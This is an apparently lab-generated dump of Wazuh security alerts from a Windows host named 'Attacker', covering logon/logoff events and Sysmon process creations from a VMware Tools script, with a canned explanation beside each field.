data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31C1A7D
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31c1a7d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2439107 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8801986Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43986 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31B4686
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31b4686 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2441575 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8808370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43987 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 2444 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated for this logon (e.g., 128‑bit); 0 means no session key was requested, as the message text notes. Unexpectedly short keys can point to a downgrade attack.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534986.2448912 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:19.2315020Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43989 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 17252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated for this logon (e.g., 128‑bit); 0 means no session key was requested, as the message text notes. Unexpectedly short keys can point to a downgrade attack.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534988.2456251 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:01.5883830Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 344551 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:49:01.506
ProcessGuid: {94294ddc-bfdd-680a-a90c-000000000e00}
ProcessId: 8208
Image: C:\Windows\System32\conhost.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Console Window Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONHOST.EXE
CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
CurrentDirectory: C:\WINDOWS
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00}
ParentProcessId: 3372
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:49:01.506 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bfdd-680a-a90c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8208 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\conhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Console Window Host No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: CONHOST.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534991.2461732 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:08.3376108Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 344733 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:49:08.269
ProcessGuid: {94294ddc-bfe4-680a-af0c-000000000e00}
ProcessId: 9536
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00}
ParentProcessId: 3372
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:49:08.269 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bfe4-680a-af0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9536 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: IP Configuration Utility No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\ipconfig /renew No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Windows\\System32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535004.2467193 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
